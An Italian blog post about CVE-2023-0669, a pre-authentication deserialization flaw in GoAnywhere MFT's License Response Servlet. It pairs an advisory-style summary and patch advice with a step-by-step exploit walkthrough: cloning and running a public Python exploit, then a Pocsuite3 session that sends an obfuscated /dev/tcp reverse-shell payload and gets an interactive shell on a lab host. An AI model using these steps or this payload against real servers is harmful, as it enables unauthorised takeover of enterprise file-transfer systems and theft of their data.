
GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet Vulnerabilità di deserializzazione Python RCE PoC(Prova di concetto)
CVE-2023-0669 GoAnywhere MFT Deserializzazione - Blog di Je Yiuwai
CVE-2023-0669 è una vulnerabilità di deserializzazione in GoAnywhere MFT. Esiste una vulnerabilità di injection di comandi pre-autenticata nel License Response Servlet a causa della deserializzazione di un oggetto controllato da un utente malintenzionato. Un attaccante può sfruttare questa vulnerabilità per eseguire codice arbitrario sul sistema interessato, portando al completo controllo del sistema. La vulnerabilità interessa le versioni precedenti alla 7.1.2, esclusa la 7.1.2.
CVE-2023-0669 è una vulnerabilità di deserializzazione in GoAnywhere MFT che esiste nel License Response Servlet a causa di una vulnerabilità di injection di comandi pre-autenticata che consente a un attaccante di eseguire codice arbitrario sul sistema interessato deserializzando un oggetto controllato dall'attaccante. La vulnerabilità interessa le versioni precedenti alla 7.1.2.
Questa vulnerabilità può rappresentare una grave minaccia per la sicurezza del software di trasferimento file aziendale GoAnywhere MFT. Gli attaccanti possono sfruttarla per rubare dati sensibili, manomettere dati e compromettere i sistemi. Pertanto, gli utenti devono adottare misure tempestive per proteggere la sicurezza del sistema.
L'avviso di sicurezza ufficiale è stato rilasciato e sono stati forniti metodi di ispezione preliminari. Gli utenti possono verificare se i propri sistemi sono interessati cercando stringhe specifiche nei log di userdata/logs. Se non è possibile applicare le patch, si consiglia di adottare altre misure di sicurezza per proteggere il sistema.
In sintesi, CVE-2023-0669 è una vulnerabilità di deserializzazione che richiede l'attenzione degli utenti. È necessario aggiornare all'ultima versione e verificare se il sistema è interessato. Inoltre, si consiglia di rafforzare la gestione della sicurezza dei software aziendali come GoAnywhere MFT, adottando misure di sicurezza multilivello per proteggere i sistemi.
Questo Exploit è uno script Python utilizzato per sfruttare la vulnerabilità CVE-2023-0669 in GoAnywhere MFT versione 6.7.9594 e precedenti.
Questa vulnerabilità esiste a causa di un problema di sicurezza nell'elaborazione delle richieste Bundle crittografate in GoAnywhere MFT. Un attaccante può inviare una richiesta appositamente predisposta per eseguire codice arbitrario sul server di destinazione.
git clone https://github.com/Avento/CVE-2023-0669.git
cd CVE-2023-0669
pip install requests cryptography
python CVE-2023-0669.py --host <IP del server di destinazione>
$ python3 CVE-2023-0669.py --host 192.168.47.179:8000
Exploit Success ~
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > check
[11:10:53] [INFO] pocsusite got a total of 1 tasks
[11:10:53] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet Deserializzazione' target 'http://192.168.47.179:8000'
[11:10:53] [+] Version : 7.0.3
[11:10:53] [INFO] Scan completed,ready to print
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
| target-url | poc-name | poc-id | component | version | status |
----------+---------+
| http://192.168.47.179:8000 | CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet Deserializzazione | CVE-2023-0669 | GoAnywhere MFT | precedente alla 7.1.2, esclusa 7.1.2 | success |
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
success : 1 / 1
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > shell
[11:11:55] [INFO] pocsusite got a total of 1 tasks
[11:11:55] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet Deserializzazione' target 'http://192.168.47.179:8000'
/bin/bash -c bash$IFS-i$IFS>&$IFS/dev/tcp/192.168.47.1/6666<&1
[11:11:55] [*] listening on 0.0.0.0:6666
[11:11:56] [+] new connection established from 192.168.47.179
[11:11:56] [INFO] Scan completed,ready to print
[11:11:56] [INFO] connect back ip: 192.168.47.1 port: 6666
[11:11:56] [INFO] watting for shell connect to pocsuite
Now Connected: 192.168.47.179
SHELL (192.168.47.179) > id
bash: cannot set terminal process group (20029): Inappropriate ioctl for device
bash: no job control in this shell
ubuntu@ubuntu:~/HelpSystems/GoAnywhere$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
Autore: Je Yiuwai modificato da xiaomi pad 6 pro